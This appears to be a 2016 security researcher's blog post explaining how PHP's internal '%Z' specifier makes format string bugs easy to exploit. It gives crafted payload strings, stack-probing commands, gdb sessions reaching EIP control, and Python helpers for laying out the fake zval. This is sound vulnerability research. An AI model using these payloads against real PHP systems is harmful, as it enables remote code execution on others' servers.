Thursday, July 28, 2016

Exploiting PHP Format String Bugs the Easy Way

I’ve been spending a lot of time poking through the PHP source code lately, and twice now I’ve come across format string vulnerabilities. [1][2]  I don’t consider format string bugs particularly interesting in and of themselves (they’re well known and well understood), but it turns out PHP format strings are special.  PHP adds functionality that makes these bugs a breeze to exploit.  Let me explain…

First though, full disclosure: this technique is not entirely my own.  The original idea was inspired by Stefan Esser (@i0n1c) back in November of 2015. [3]  If you enjoy security research, especially relating to PHP, I would highly recommend you follow him!

OK. PHP handles most format strings using custom internal functions, and there are lots of them defined throughout the code.  For instance, let’s grep for function definitions that take a format string as an argument.  This isn’t perfect or scientific, but it gives you an idea.

andrew@thinkpad /tmp % grep -PRHn "const char ?\* ?(format|fmt)" ./php-7.0.3 | wc -l
149

I won’t post all of those, but here are two examples.  In fact, these are the same functions that were erroneously called in the two bugs linked below.

static void zend_throw_or_error(int fetch_type, zend_class_entry *exception_ce, const char *format, ...)
ZEND_API ZEND_COLD zend_object *zend_throw_exception_ex(zend_class_entry *exception_ce, zend_long code, const char *format, ...)
... etc ...

Most, if not all, of these internal format string functions ultimately call either “xbuf_format_converter” (defined in main/spprintf.c), or “format_converter” (defined in main/snprintf.c).  These two functions actually do the work of walking along the string and substituting specifiers with their corresponding values.  This would be totally uninteresting, except for the fact that PHP adds one block that you don’t see in other format string implementations.  From “main/spprintf.c”…

case 'Z': {
    zvp = (zval*) va_arg(ap, zval*);
    free_zcopy = zend_make_printable_zval(zvp, &zcopy);
    if (free_zcopy) {
        zvp = &zcopy;
    }
    s_len = Z_STRLEN_P(zvp);
    s = Z_STRVAL_P(zvp);
    if (adjust_precision && precision < s_len) {
        s_len = precision;
    }
    break;
}

This special “%Z” option is designed to convert what’s known as a “zval” to a string. A zval (defined in Zend/zend_types.h) is simply a structure containing information about a variable, such as its type and value. Here is its definition, watered down for clarity…

typedef union _zend_value {
    zend_string      *str;
    zend_array       *arr;
    zend_object      *obj;
    ... lots of possible types ...
} zend_value;
 
struct _zval_struct {
    zend_value        value;
    union {
        struct {
            ZEND_ENDIAN_LOHI_4(
                zend_uchar    type,
                zend_uchar    type_flags,
                zend_uchar    const_flags,
                zend_uchar    reserved)
        } v;
        uint32_t type_info;
    } u1;
    ... uninteresting bits removed ...
 
};

As you can see, a zval contains type information, as well as an element (value) which can be interpreted in any number of different ways depending on the declared type. As long as the code above is operating on a real zval (which is assumed to be the case, since “%Z” is only used internally), everything works fine. However, if we are able to specify a “%Z” on data we control, as is the case with format string bugs, we can force PHP to do unexpected things.

So… let’s assume we can control the data; what’s actually going on here? As shown above, when “%Z” is specified, PHP calls “zend_make_printable_zval” on our fake zval, which eventually calls “_zval_get_string_func” (defined in Zend/zend_operators.c).  This function contains a switch/case operating on the “type” field of the zval struct.  Most of the cases are boring, converting integers to strings and such, but one stands out: IS_OBJECT.

case IS_OBJECT: {
   zval tmp;
   if (Z_OBJ_HT_P(op)->cast_object) {
      if (Z_OBJ_HT_P(op)->cast_object(op, &tmp, IS_STRING) == SUCCESS) {
... etc ...

Function pointers!  That looks juicy!  Let’s investigate those macros.  From Zend/zend_types.h:

#define Z_OBJ(zval)        (zval).value.obj
#define Z_OBJ_P(zval_p)    Z_OBJ(*(zval_p))
 
#define Z_OBJ_HT(zval)     Z_OBJ(zval)->handlers
#define Z_OBJ_HT_P(zval_p) Z_OBJ_HT(*(zval_p))

Oh goodie! :) If we use the “%Z” operator on memory we control, we will control those function pointers too!  All we need to do is arrange a fake zval in memory such that they become something useful.  Since we know what the struct(s) should look like, this shouldn’t be too hard.

To test this, we’ll use the SNMP error format string bug (PHP bug #71704) [2]. The trigger looks like this:

$session = new SNMP(SNMP::VERSION_3, "127.0.0.1:161", "public");
$session->exceptions_enabled = SNMP::ERRNO_ANY;
try {
    $session->get($argv[1]); // FORMAT STRING IN ARGV[1]
} catch (SNMPException $e) {
    echo $e->getMessage();
}

Let’s start by poking around memory to find a pointer to our data.  We’ll use a series of “%d”s to walk down the stack, followed by “woot%swoot”.  If we ever see our data show up between the “woot” markers, we win!

andrew@thinkpad /tmp % for i in {0..15}; do \
> echo -e "\n=========$i=========="; \
> ./php-7.0.3/sapi/cli/php ./snmp.php \
>     `perl -e 'print "%d"x'$i' . "woot%swoot";'`; \
> done
 
=========0==========
Invalid object identifier: woot0�%�
                                   �'�
                                      �'�U�woot
=========1==========
woot
=========2==========
Invalid object identifier: -1077237472-1216724645woot �%��Iwoot
=========3==========
Segmentation fault (core dumped)
 
=========4==========
Invalid object identifier: -1079040880-1216933541-12561159361wootwoot
=========5==========
Segmentation fault (core dumped)
 
=========6==========
Invalid object identifier: -1074727184-1216655013-12561159361-12561159361woot(null)woot
=========7==========
Invalid object identifier: -1076316912-1217130149-12561159361-125611593610woowoot
=========8==========
Invalid object identifier: -1080902384-1217461925-12582130881-125821308810-1257840348woot�� ��$�woot
=========9==========
Invalid object identifier: -1075700320-1217191589-12561159361-125611593610-1255743196136380004woot$�&�woot
=========10==========
Invalid object identifier: -1079922576-1217162917-12561159361-125611593610-1255743196136380004-1256115968woot(null)woot
=========11==========
Segmentation fault (core dumped)
 
=========12==========
Invalid object identifier: -1075153200-1217171109-12561159361-125611593610-1255743196136380004-1256115968032wootInvalid object identifier: %swoot
=========13==========
Invalid object identifier: -1081187680-1217064613-12561159361-125611593610-1255743196136380004-1256115968032142166864woot%d%d%d%d%d%d%d%d%d%d%d%d%dwoot%swootwoot
=========14==========
Invalid object identifier: -1078765664-1216839333-12561159361-125611593610-1255743196136380004-1256115968032142166864-1255809008wootwoot
=========15==========
Invalid object identifier: -1075294480-1216716453-12561159361-125611593610-1255743196136380004-1256115968032142166864-1255809008-1255702516woot�woottnvalid object identifier: -1079248000woot�åN

Aha!!! If you didn’t already see it, check out number 13.  After popping 13 values off the stack, the 14th value was a pointer to our string. Switching the “%s” with a “%08x” reveals the pointer to be 0xb5a5e010.  It doesn’t seem to change much, so for now let’s ignore the obvious ASLR problem and focus on getting EIP.
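For what it’s worth, the probing loop and the test for a hit can be sketched in a few lines of Python. This is only an illustration: “probe” and “reflects_input” are hypothetical helper names, and the check assumes the target echoes the formatted message back to us, as the SNMP exception does here.

```python
MARKER = "woot"


def probe(pops: int) -> str:
    """Format string that consumes `pops` arguments with %d, then prints the next one with %s."""
    return "%d" * pops + MARKER + "%s" + MARKER


def reflects_input(output: str, pops: int) -> bool:
    """True if %s printed the format string itself between the markers.

    That only happens when the argument following `pops` pops is a pointer
    to our own input.
    """
    return MARKER + probe(pops) + MARKER in output
```

Feeding each captured output through “reflects_input” would flag iteration 13 above and reject the others, including the near miss at 12 where “%s” printed PHP’s own message template instead of our string.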

First let’s open it up in gdb and see what’s happening.  We know that PHP will be expecting a zval at the pointer, so let’s add some junk data to the start of our string.  This will be our fake zval.  Based on the struct definition above, we know the 9th byte represents the type.  In this case we’d like to represent the OBJECT type, which is 0x08.  Let’s also add some extra padding so that we have room to play as we go. All said, our fake zval will look like:

[ fake zval ............ ][ junk ......][ format string  ]
[ 8bytes padding ][ 0x08 ][some padding][ %d x 13 ][ %Z  ]
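
If you’d rather not count bytes by hand, here is a rough Python sketch of the same layout. The ctypes classes are a simplified model of the 32-bit zval, not PHP’s real headers: pointers are modelled as 32-bit integers, and the double member (which the full zend_value definition also has) is what makes the union 8 bytes wide. “fake_zval” and “trigger” are hypothetical helper names.

```python
import ctypes

IS_OBJECT = 8  # type tag for objects in PHP 7


class ZendValue32(ctypes.Union):
    # Simplified model: every pointer member collapses into one 32-bit field.
    _fields_ = [
        ("lval", ctypes.c_int32),
        ("dval", ctypes.c_double),
        ("ptr", ctypes.c_uint32),
    ]


class Zval32(ctypes.Structure):
    # Little-endian field order, as produced by ZEND_ENDIAN_LOHI_4.
    _fields_ = [
        ("value", ZendValue32),
        ("type", ctypes.c_uint8),
        ("type_flags", ctypes.c_uint8),
        ("const_flags", ctypes.c_uint8),
        ("reserved", ctypes.c_uint8),
        ("u2", ctypes.c_uint32),
    ]


TYPE_OFFSET = Zval32.type.offset  # offset 8, i.e. the 9th byte


def fake_zval(value: bytes = b"AAAABBBB", padding: bytes = b"CCCC") -> bytes:
    """Bytes for the value field, then the IS_OBJECT type tag, then room to play."""
    if len(value) != TYPE_OFFSET:
        raise ValueError("value must fill the bytes before the type field")
    return value + bytes([IS_OBJECT]) + padding


def trigger(pops: int = 13) -> bytes:
    """Pop `pops` arguments, then treat the next one as a zval pointer."""
    return b"%d" * pops + b"%Z"
```

Concatenating “fake_zval()” and “trigger()” gives the same bytes as the echo -e argument used in the gdb session that follows.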

andrew@thinkpad /tmp % gdb -q ./php-7.0.3/sapi/cli/php 
Reading symbols from ./php-7.0.3/sapi/cli/php...done.
(gdb) r ./snmp.php `echo -e "AAAABBBB\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
Starting program: /home/ubuntu/php-7.0.3/sapi/cli/php ./snmp.php `echo -e "AAAABBBB\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
 
Program received signal SIGSEGV, Segmentation fault.
0x08301482 in _zval_get_string_func (op=op@entry=0xb5a5e010)
    at /home/ubuntu/php-7.0.3/Zend/zend_operators.c:838
838             if (Z_OBJ_HT_P(op)->cast_object) {
(gdb) x/1i $eip
=> 0x8301482 <_zval_get_string_func>:  mov    0x10(%ebx),%edx
(gdb) i r $ebx
ebx            0x41414141   1094795585
(gdb)

Nice! We landed just where we wanted to, and now PHP is trying to dereference our AAAA. We’d like to give it a valid address, so how about the address of BBBB directly after? Math time: if AAAA is at 0xb5a5e010, that means BBBB is at 0xb5a5e014. However, the instruction isn’t dereferencing the pointer exactly, but rather 16 bytes past it (0x10). So we need to subtract 0x10 from our pointer to compensate, giving us 0xb5a5e004. Let’s try it. Don’t forget to reverse the byte order, since x86 is little endian.
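
Before firing it off, here is the same arithmetic as a small Python sketch. The string address and the 0x10 displacement come straight from the gdb output above and are specific to this build; “pointer_for” is just a hypothetical helper name.

```python
import struct

STRING_ADDR = 0xB5A5E010   # where our string lives, per the %08x leak
HANDLERS_DISP = 0x10       # displacement in "mov 0x10(%ebx),%edx" on this build


def pointer_for(target_addr: int, displacement: int) -> int:
    """Value to plant so that (value + displacement) lands on target_addr."""
    return (target_addr - displacement) & 0xFFFFFFFF


bbbb_addr = STRING_ADDR + 4                       # BBBB follows the 4-byte AAAA
fake_obj = pointer_for(bbbb_addr, HANDLERS_DISP)  # 0xb5a5e004
packed = struct.pack("<I", fake_obj)              # little-endian, as x86 expects
```

Here “packed” holds the bytes 04 e0 a5 b5, which is exactly what replaces AAAA in the next run.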

andrew@thinkpad /tmp % gdb -q ./php-7.0.3/sapi/cli/php 
Reading symbols from ./php-7.0.3/sapi/cli/php...done.
(gdb) r ./snmp.php `echo -e "\x04\xe0\xa5\xb5BBBB\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
Starting program: /home/ubuntu/php-7.0.3/sapi/cli/php ./snmp.php `echo -e "\x04\xe0\xa5\xb5BBBB\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
 
Program received signal SIGSEGV, Segmentation fault.
0x08301485 in _zval_get_string_func (op=op@entry=0xb5a5e010)
    at /home/ubuntu/php-7.0.3/Zend/zend_operators.c:838
838             if (Z_OBJ_HT_P(op)->cast_object) {
(gdb) x/1i $eip
=> 0x8301485 <_zval_get_string_func>:  mov    0x54(%edx),%eax
(gdb) i r $ebx $edx
ebx            0xb5a5e004   -1247420412
edx            0x42424242   1111638594
(gdb)

Sweet! It used our pointer and is now trying to dereference BBBB. Rinse and repeat. This time let’s target CCCC. Since it sits 9 bytes into the string, its address will be 0xb5a5e019; again, though, we need to account for the offset, which this time is 0x54. Simple subtraction gives us 0xb5a5dfc5. Let’s try it.
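
As a sanity check before running it, the whole pointer chase can be simulated offline. The sketch below is a toy model, not PHP: it treats our string as the only readable memory, and the 0x10 and 0x54 displacements are the ones observed in gdb for this particular binary. “read_u32” and “resolve_cast_object” are hypothetical names.

```python
import struct

BASE = 0xB5A5E010  # address of our string on this build
IS_OBJECT = 8

# [fake obj ptr][fake handlers ptr][type][would-be cast_object pointer]
payload = (
    struct.pack("<I", 0xB5A5E014 - 0x10)    # 0xb5a5e004
    + struct.pack("<I", 0xB5A5E019 - 0x54)  # 0xb5a5dfc5
    + bytes([IS_OBJECT])
    + b"CCCC"
)


def read_u32(addr: int) -> int:
    """Read a little-endian 32-bit word from the modelled string memory."""
    offset = addr - BASE
    if not 0 <= offset <= len(payload) - 4:
        raise ValueError(f"address {addr:#x} is outside our string")
    return struct.unpack_from("<I", payload, offset)[0]


def resolve_cast_object(op: int) -> int:
    """Follow op->value.obj->handlers->cast_object as the disassembly does."""
    if payload[op - BASE + 8] != IS_OBJECT:
        raise ValueError("type byte is not IS_OBJECT")
    obj = read_u32(op)               # zval.value.obj
    handlers = read_u32(obj + 0x10)  # obj->handlers
    return read_u32(handlers + 0x54) # handlers->cast_object


target = resolve_cast_object(BASE)
```

In this model “target” comes out as 0x43434343, so if the real process behaves the same way, EIP should end up pointing at CCCC.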

andrew@thinkpad /tmp % gdb -q ./php-7.0.3/sapi/cli/php 
Reading symbols from ./php-7.0.3/sapi/cli/php...done.
(gdb) r ./snmp.php `echo -e "\x04\xe0\xa5\xb5\xc5\xdf\xa5\xb5\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
Starting program: /home/ubuntu/php-7.0.3/sapi/cli/php ./snmp.php `echo -e "\x04\xe0\xa5\xb5\xc5\xdf\xa5\xb5\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
 
Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
(gdb) i r $ebx $edx $eip
ebx            0xb5a5e004   -1247420412
edx            0xbfffb060   -1073762208
eip            0x43434343   0x43434343
(gdb)

We win! With control of EIP it’s essentially game over. The only big problem still standing in our way is ASLR. Considering the wide variety of PHP binaries that exist in the wild, as well as the prevalence of ASLR, this would normally be quite tricky. But we have another trick up our sleeve. We can cheat!

As long as we’re careful, an invalid format string won’t necessarily crash the application, even if it misbehaves. With a little finesse we can use the same format string bug to leak an address. Once we know the address of a string, we can patch it dynamically and then run it through again; this time for real. The challenge then becomes modifying the string without modifying its location. I’ll leave that as an exercise for the reader. :)

If you’d like to see a working exploit for this issue, mine is public on exploit-db. [4] It bypasses ASLR and NX beautifully. All the pointers and ROP gadgets are from a custom binary, so you’ll still need to put your own work in, but it’s a start. Enjoy!

[1]. https://bugs.php.net/bug.php?id=71105
[2]. https://bugs.php.net/bug.php?id=71704
[3]. https://twitter.com/i0n1c/status/664706994478161920
[4]. https://www.exploit-db.com/exploits/39645/